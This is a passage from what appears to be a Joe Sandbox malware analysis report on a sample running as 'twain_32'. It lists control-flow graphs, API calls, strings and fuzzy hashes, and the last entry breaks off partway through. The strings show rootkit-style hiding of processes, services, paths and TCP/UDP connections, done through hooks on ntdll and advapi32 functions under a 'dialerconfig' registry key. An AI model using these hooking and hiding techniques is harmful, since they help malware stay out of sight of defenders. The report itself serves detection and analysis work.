                                                                • Instruction Fuzzy Hash: 0E613432B0125187EF6ACF17D468B6CBB91FB05B94F168026EB1917B85EB38E852C700

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 50 24b34553930-24b3455393b 51 24b3455393d-24b34553950 StrCmpNIW 50->51 52 24b34553955-24b3455395c 50->52 51->52 53 24b34553952 51->53 53->52
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: dialer
                                                                • API String ID: 0-3528709123
                                                                • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                • Instruction ID: 444d615e32078026dcfcf85b658ef5a362f3855be5e17900db7626ea8198546e
                                                                • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                • Instruction Fuzzy Hash: 2BD0A760B2120B96FF16DFA388C92782764EF24704F4590A4CA0602614D71CCD8DC710

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 54 7ff7959714b0-7ff7959714c1 call 7ff795971180
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2021751568.00007FF795971000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF795970000, based on PE: true
                                                                • Associated: 00000002.00000002.2021694459.00007FF795970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000002.00000002.2021799627.00007FF79598C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000002.00000002.2021921419.00007FF7959B1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000002.00000002.2023738044.00007FF795F20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000002.00000002.2023794544.00007FF795F22000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000002.00000002.2023880054.00007FF795F2C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000002.00000002.2024075384.00007FF795F2F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000002.00000002.2024154148.00007FF795F30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff795970000_twain_32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb5c6534e4c04ebd538560d10e43928af4972f6842d27c7db5461c4125a24275
                                                                • Instruction ID: b24d9f1b37f6766ebb79ff98fd3342cb52e2fb2b6c5663d8c1a260ced3c0f0e5
                                                                • Opcode Fuzzy Hash: cb5c6534e4c04ebd538560d10e43928af4972f6842d27c7db5461c4125a24275
                                                                • Instruction Fuzzy Hash: 3CB0127090431985F3103F21D84126877E06B05F70FC08032C40C0B352CF7C50404B30

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 151 24b34552cdc-24b34552d55 call 24b3456ecc0 154 24b34553090-24b345530b3 151->154 155 24b34552d5b-24b34552d61 151->155 155->154 156 24b34552d67-24b34552d6a 155->156 156->154 157 24b34552d70-24b34552d73 156->157 157->154 158 24b34552d79-24b34552d89 GetModuleHandleA 157->158 159 24b34552d8b-24b34552d9b GetProcAddress 158->159 160 24b34552d9d 158->160 161 24b34552da0-24b34552dbe 159->161 160->161 161->154 163 24b34552dc4-24b34552de3 StrCmpNIW 161->163 163->154 164 24b34552de9-24b34552ded 163->164 164->154 165 24b34552df3-24b34552dfd 164->165 165->154 166 24b34552e03-24b34552e0a 165->166 166->154 167 24b34552e10-24b34552e23 166->167 168 24b34552e33 167->168 169 24b34552e25-24b34552e31 167->169 170 24b34552e36-24b34552e3a 168->170 169->170 171 24b34552e3c-24b34552e48 170->171 172 24b34552e4a 170->172 173 24b34552e4d-24b34552e57 171->173 172->173 174 24b34552f4d-24b34552f51 173->174 175 24b34552e5d-24b34552e60 173->175 176 24b34553082-24b3455308a 174->176 177 24b34552f57-24b34552f5a 174->177 178 24b34552e72-24b34552e7c 175->178 179 24b34552e62-24b34552e6f call 24b34551a14 175->179 176->154 176->167 183 24b34552f5c-24b34552f68 call 24b34551a14 177->183 184 24b34552f6b-24b34552f75 177->184 181 24b34552eb0-24b34552eba 178->181 182 24b34552e7e-24b34552e8b 178->182 179->178 187 24b34552ebc-24b34552ec9 181->187 188 24b34552eea-24b34552eed 181->188 182->181 186 24b34552e8d-24b34552e9a 182->186 183->184 190 24b34552f77-24b34552f84 184->190 191 24b34552fa5-24b34552fa8 184->191 195 24b34552e9d-24b34552ea3 186->195 187->188 196 24b34552ecb-24b34552ed8 187->196 197 24b34552eef-24b34552ef9 call 24b34551d28 188->197 198 24b34552efb-24b34552f08 lstrlenW 188->198 190->191 192 24b34552f86-24b34552f93 190->192 193 24b34552faa-24b34552fb3 call 24b34551d28 191->193 194 24b34552fb5-24b34552fc2 lstrlenW 191->194 200 24b34552f96-24b34552f9c 192->200 193->194 211 24b34552ffa-24b34553005 193->211 206 24b34552fc4-24b34552fce 194->206 207 24b34552fe5-24b34552fef call 24b34553930 194->207 204 24b34552ea9-24b34552eae 195->204 205 24b34552f43-24b34552f48 195->205 208 24b34552edb-24b34552ee1 196->208 197->198 197->205 201 24b34552f2b-24b34552f3d call 24b34553930 198->201 202 24b34552f0a-24b34552f14 198->202 210 24b34552f9e-24b34552fa3 200->210 200->211 201->205 215 24b34552ff2-24b34552ff4 201->215 202->201 212 24b34552f16-24b34552f29 call 24b34551554 202->212 204->181 204->195 205->215 206->207 216 24b34552fd0-24b34552fe3 call 24b34551554 206->216 207->215 208->205 217 24b34552ee3-24b34552ee8 208->217 210->191 210->200 220 24b3455307c-24b34553080 211->220 221 24b34553007-24b3455300b 211->221 212->201 212->205 215->176 215->211 216->207 216->211 217->188 217->208 220->176 226 24b3455300d-24b34553011 221->226 227 24b34553013-24b3455302d call 24b345586a0 221->227 226->227 230 24b34553030-24b34553033 226->230 227->230 233 24b34553056-24b34553059 230->233 234 24b34553035-24b34553053 call 24b345586a0 230->234 233->220 236 24b3455305b-24b34553079 call 24b345586a0 233->236 234->233 236->220
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                • API String ID: 2119608203-3850299575
                                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                • Instruction ID: 5c5b8e0daec9f96b87ff6f9188b9990117e12d52893254b783dd3ed5ecd27091
                                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                • Instruction Fuzzy Hash: B5B1B272A2069082EB668F27D4497BD7BA4FB54B84F5650D6EE0A53BA4EF35CC40C740

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 3140674995-0
                                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                • Instruction ID: 90b98d75525b3e2d48bc12740e847bae4a34f6bcdfcfb0bc8cdd03adf0e50ab7
                                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                • Instruction Fuzzy Hash: 6F318F72714B809AEB61CF65E8443EE77A0F794744F45446ADB4E47B98EF38C648CB10
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 1239891234-0
                                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                • Instruction ID: cfc69f5530ad124ce9089603fc51521ed3bd57a50e07844054b0634479e0035e
                                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                • Instruction Fuzzy Hash: AB318436614F8096DB61CF36E8483AE77A4F788754F510166EB9E43B98EF38C555CB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                • String ID:
                                                                • API String ID: 1443284424-0
                                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                • Instruction ID: f296295901d8fa7776a2d1f494c46bf385356d41481bd104ebb9cc3ccc27cfe8
                                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                • Instruction Fuzzy Hash: 10E11333B24B80AAE702CF66D4882ED7BB1F345B98F515196DE4A57B99DB38C41AC700

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                • API String ID: 106492572-2879589442
                                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                • Instruction ID: e90a5aa5c89fe02bbc84e9b332a465cb597a200f043077e6c4b51a4a483b4005
                                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                • Instruction Fuzzy Hash: DC713E36F20A5096EB219F67E8586AD3FB4F794B98F422191DE4E47B28EF38C445C300

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                • String ID: d
                                                                • API String ID: 2005889112-2564639436
                                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                • Instruction ID: 3407295026c361d9330cb41a95ea245ed41110f4788d19868229ae86b4a20850
                                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                • Instruction Fuzzy Hash: DF516D72A14B44E3EB15CF63E5483AEBBA1F799B80F058164DA8A07B14DF3CC456CB40

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                • API String ID: 4175298099-1975688563
                                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                • Instruction ID: ea0b892fb279d8debb9c3f36592e9dd5128f69302e407fab3566eeabda5e6e7d
                                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                • Instruction Fuzzy Hash: 7A31C460E2194AB1FB07EFA7E8596E83B21F745344F8764D3A50A12166AF3CC649C780

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                • API String ID: 2171963597-1373409510
                                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                • Instruction ID: b6321b7cde6eeda92140478d89bf033faffef8b951ee285382cb097700a6067e
                                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                • Instruction Fuzzy Hash: 1C213036A24B4093FB11CF26F54836A7BA0F789BA4F515255EA5942FA8DF3CC549CF00

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                • String ID: d
                                                                • API String ID: 3743429067-2564639436
                                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                • Instruction ID: 8cad0056f30da436b6ecf3622d9a60668c047e1aba9814d6c73bd6228e9fdf64
                                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                • Instruction Fuzzy Hash: 65419233A14B80D7E761DF62E5487AEBBA1F389B94F018165DB8A07B58DF38D164CB40

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 264 24b345169f0-24b345169f6 265 24b34516a31-24b34516a3b 264->265 266 24b345169f8-24b345169fb 264->266 267 24b34516b58-24b34516b6d 265->267 268 24b345169fd-24b34516a00 266->268 269 24b34516a25-24b34516a64 call 24b345170a0 266->269 273 24b34516b7c-24b34516b96 call 24b34516f34 267->273 274 24b34516b6f 267->274 271 24b34516a02-24b34516a05 268->271 272 24b34516a18 __scrt_dllmain_crt_thread_attach 268->272 287 24b34516b32 269->287 288 24b34516a6a-24b34516a7f call 24b34516f34 269->288 278 24b34516a11-24b34516a16 call 24b34516fe4 271->278 279 24b34516a07-24b34516a10 271->279 276 24b34516a1d-24b34516a24 272->276 285 24b34516bcf-24b34516c00 call 24b34517270 273->285 286 24b34516b98-24b34516bcd call 24b3451705c call 24b34516efc call 24b345173f8 call 24b34517210 call 24b34517234 call 24b3451708c 273->286 280 24b34516b71-24b34516b7b 274->280 278->276 296 24b34516c02-24b34516c08 285->296 297 24b34516c11-24b34516c17 285->297 286->280 291 24b34516b34-24b34516b49 287->291 299 24b34516a85-24b34516a96 call 24b34516fa4 288->299 300 24b34516b4a-24b34516b57 call 24b34517270 288->300 296->297 301 24b34516c0a-24b34516c0c 296->301 302 24b34516c5e-24b34516c74 call 24b34512858 297->302 303 24b34516c19-24b34516c23 297->303 318 24b34516a98-24b34516abc call 24b345173bc call 24b34516eec call 24b34516f18 call 24b345190dc 299->318 319 24b34516ae7-24b34516af1 call 24b34517210 299->319 300->267 307 24b34516cff-24b34516d0c 301->307 321 24b34516cac-24b34516cae 302->321 322 24b34516c76-24b34516c78 302->322 308 24b34516c2f-24b34516c3d call 24b34522758 303->308 309 24b34516c25-24b34516c2d 303->309 315 24b34516c43-24b34516c58 call 24b345169f0 308->315 331 24b34516cf5-24b34516cfd 308->331 309->315 315->302 315->331 318->319 367 24b34516abe-24b34516ac5 __scrt_dllmain_after_initialize_c 318->367 319->287 340 24b34516af3-24b34516aff call 24b34517260 319->340 329 24b34516cb0-24b34516cb3 321->329 330 24b34516cb5-24b34516cca call 24b345169f0 321->330 322->321 328 24b34516c7a-24b34516c9c call 24b34512858 call 24b34516b58 322->328 328->321 361 24b34516c9e-24b34516ca6 call 24b34522758 328->361 329->330 329->331 330->331 349 24b34516ccc-24b34516cd6 330->349 331->307 351 24b34516b01-24b34516b0b call 24b34517178 340->351 352 24b34516b25-24b34516b30 340->352 355 24b34516ce1-24b34516cf1 call 24b34522758 349->355 356 24b34516cd8-24b34516cdf 349->356 351->352 366 24b34516b0d-24b34516b1b 351->366 352->291 355->331 356->331 361->321 366->352 367->319 368 24b34516ac7-24b34516ae4 call 24b34519078 367->368 368->319
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019665355.0000024B34510000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024B34510000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34510000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                • String ID:
                                                                • API String ID: 190073905-0
                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                • Instruction ID: 70c786460b94815fabdf2fd04ae17c75ffcec4a25f331f08c2e267900124707f
                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                • Instruction Fuzzy Hash: F281E521F0228587FF53AF2B946D7596ED0EB97784F4740EAEE05437A6DB39C8868700

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 371 24b345575f0-24b345575f6 372 24b34557631-24b3455763b 371->372 373 24b345575f8-24b345575fb 371->373 374 24b34557758-24b3455776d 372->374 375 24b345575fd-24b34557600 373->375 376 24b34557625-24b34557664 call 24b34557ca0 373->376 379 24b3455776f 374->379 380 24b3455777c-24b34557796 call 24b34557b34 374->380 377 24b34557602-24b34557605 375->377 378 24b34557618 __scrt_dllmain_crt_thread_attach 375->378 394 24b34557732 376->394 395 24b3455766a-24b3455767f call 24b34557b34 376->395 382 24b34557611-24b34557616 call 24b34557be4 377->382 383 24b34557607-24b34557610 377->383 386 24b3455761d-24b34557624 378->386 384 24b34557771-24b3455777b 379->384 392 24b345577cf-24b34557800 call 24b34557e70 380->392 393 24b34557798-24b345577cd call 24b34557c5c call 24b34557afc call 24b34557ff8 call 24b34557e10 call 24b34557e34 call 24b34557c8c 380->393 382->386 403 24b34557802-24b34557808 392->403 404 24b34557811-24b34557817 392->404 393->384 398 24b34557734-24b34557749 394->398 406 24b3455774a-24b34557757 call 24b34557e70 395->406 407 24b34557685-24b34557696 call 24b34557ba4 395->407 403->404 409 24b3455780a-24b3455780c 403->409 410 24b3455785e-24b34557863 404->410 411 24b34557819-24b34557823 404->411 406->374 421 24b34557698-24b345576bc call 24b34557fbc call 24b34557aec call 24b34557b18 call 24b34559cdc 407->421 422 24b345576e7-24b345576f1 call 24b34557e10 407->422 416 24b345578ff-24b3455790c 409->416 415 24b34557866 call 24b34553458 410->415 417 24b3455782f-24b3455783d call 24b34563358 411->417 418 24b34557825-24b3455782d 411->418 423 24b3455786b-24b34557874 415->423 424 24b34557843-24b34557858 call 24b345575f0 417->424 440 24b345578f5-24b345578fd 417->440 418->424 421->422 474 24b345576be-24b345576c5 __scrt_dllmain_after_initialize_c 421->474 422->394 442 24b345576f3-24b345576ff call 24b34557e60 422->442 429 24b345578ac-24b345578ae 423->429 430 24b34557876-24b34557878 423->430 424->410 424->440 438 24b345578b0-24b345578b3 429->438 439 24b345578b5-24b345578ca call 24b345575f0 429->439 430->429 437 24b3455787a-24b3455787f 430->437 444 24b34557882 call 24b34553458 437->444 438->439 438->440 439->440 453 24b345578cc-24b345578d6 439->453 440->416 461 24b34557701-24b3455770b call 24b34557d78 442->461 462 24b34557725-24b34557730 442->462 452 24b34557887-24b3455789c call 24b34557758 444->452 452->429 468 24b3455789e-24b345578a6 call 24b34563358 452->468 458 24b345578e1-24b345578f1 call 24b34563358 453->458 459 24b345578d8-24b345578df 453->459 458->440 459->440 461->462 473 24b3455770d-24b3455771b 461->473 462->398 468->429 473->462 474->422 475 24b345576c7-24b345576e4 call 24b34559c78 474->475 475->422
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                • String ID:
                                                                • API String ID: 190073905-0
                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                • Instruction ID: e987d588453d9a0882a436858a3a4ee9ec9779299a2ced2196404dfe7a44c781
                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                • Instruction Fuzzy Hash: F3810131F2474186FB53AF6BA84D3BD7E90BB85780F0A44E59A0B87796EB38C845C700

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 478 24b34559804-24b34559842 479 24b34559848-24b3455984b 478->479 480 24b34559933 478->480 481 24b34559851 479->481 482 24b34559935-24b34559951 479->482 480->482 483 24b34559854 481->483 484 24b3455992b 483->484 485 24b3455985a-24b34559869 483->485 484->480 486 24b3455986b-24b3455986e 485->486 487 24b34559876-24b34559895 LoadLibraryExW 485->487 488 24b3455990d-24b3455991c GetProcAddress 486->488 489 24b34559874 486->489 490 24b345598ed-24b34559902 487->490 491 24b34559897-24b345598a0 GetLastError 487->491 488->484 493 24b3455991e-24b34559929 488->493 494 24b345598e1-24b345598e8 489->494 490->488 492 24b34559904-24b34559907 FreeLibrary 490->492 495 24b345598cf-24b345598d9 491->495 496 24b345598a2-24b345598b7 call 24b3455ad28 491->496 492->488 493->482 494->483 495->494 496->495 499 24b345598b9-24b345598cd LoadLibraryExW 496->499 499->490 499->495
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                • String ID: api-ms-
                                                                • API String ID: 2559590344-2084034818
                                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                • Instruction ID: dc55cfd5e5651223e85ded8bef42bcdc51b788dd9f083743360b3352e1f95fc3
                                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                • Instruction Fuzzy Hash: D231A531A12650A1FE139F03A4087AD6BA4FB48BA4F5B05A5ED2E4B390EF3CD4458B00

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                • String ID: CONOUT$
                                                                • API String ID: 3230265001-3130406586
                                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                • Instruction ID: 9ef0435c68a918fe967c030b4119e9a002b44be8bfac580f7c17afb1c5c85b4a
                                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                • Instruction Fuzzy Hash: 0411BF21B24B4096E7528F43E848329BAA0F398FE4F051264EA5E877A4CF7CC9088740

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 523 24b34555c10-24b34555c37 524 24b34555c4b-24b34555c56 GetCurrentThreadId 523->524 525 24b34555c39-24b34555c48 523->525 526 24b34555c62-24b34555c69 524->526 527 24b34555c58-24b34555c5d 524->527 525->524 529 24b34555c7b-24b34555c8f 526->529 530 24b34555c6b-24b34555c76 call 24b34555a40 526->530 528 24b3455608f-24b345560a6 call 24b34557a20 527->528 533 24b34555c9e-24b34555ca4 529->533 530->528 536 24b34555caa-24b34555cb3 533->536 537 24b34555d75-24b34555d96 533->537 539 24b34555cfa-24b34555d6d call 24b345545f0 call 24b34554590 call 24b34554550 536->539 540 24b34555cb5-24b34555cf8 call 24b345586a0 536->540 542 24b34555eff-24b34555f10 call 24b3455759f 537->542 543 24b34555d9c-24b34555dbc GetThreadContext 537->543 550 24b34555d70 539->550 540->550 557 24b34555f15-24b34555f1b 542->557 547 24b34555dc2-24b34555de3 543->547 548 24b34555efa 543->548 547->548 555 24b34555de9-24b34555df2 547->555 548->542 550->533 559 24b34555e72-24b34555e83 555->559 560 24b34555df4-24b34555e05 555->560 561 24b34555f21-24b34555f78 VirtualProtect FlushInstructionCache 557->561 562 24b34555fde-24b34555fee 557->562 563 24b34555ef5 559->563 564 24b34555e85-24b34555ea3 559->564 568 24b34555e6d 560->568 569 24b34555e07-24b34555e1c 560->569 570 24b34555f7a-24b34555f84 561->570 571 24b34555fa9-24b34555fd9 call 24b3455798c 561->571 565 24b34555ff0-24b34555ff7 562->565 566 24b34555ffe-24b3455600a call 24b34554ed0 562->566 564->563 572 24b34555ea5-24b34555eec call 24b345539e0 564->572 565->566 574 24b34555ff9 call 24b345544c0 565->574 585 24b3455600f-24b34556015 566->585 568->563 569->568 576 24b34555e1e-24b34555e68 call 24b34553a50 SetThreadContext 569->576 570->571 577 24b34555f86-24b34555fa1 call 24b34554470 570->577 571->557 572->563 588 24b34555ef0 call 24b345575bd 572->588 574->566 576->568 577->571 589 24b34556057-24b34556075 585->589 590 24b34556017-24b34556055 ResumeThread call 24b3455798c 585->590 588->563 592 24b34556077-24b34556086 589->592 593 24b34556089 589->593 590->585 592->593 593->528
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: Thread$Current$Context
                                                                • String ID:
                                                                • API String ID: 1666949209-0
                                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                • Instruction ID: 4d774fc6b0c7c165cf0d4385b73785905952d05d31a7f4a527336975a6f6150c
                                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                • Instruction Fuzzy Hash: D1D19D76609B8882DA719F1AE49436E7BA0F7C8B84F150596EA8E47B69DF3CC541CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2019851682.0000024B34550000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B34550000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_24b34550000_twain_32.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocFree
                                                                • String ID: dialer
                                                                • API String ID: 756756679-3528709123
                                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                • Instruction ID: d64092b85631d4f3496dcd9cfcfdea356b8ec0cf89811db26c05aa686ada59a8
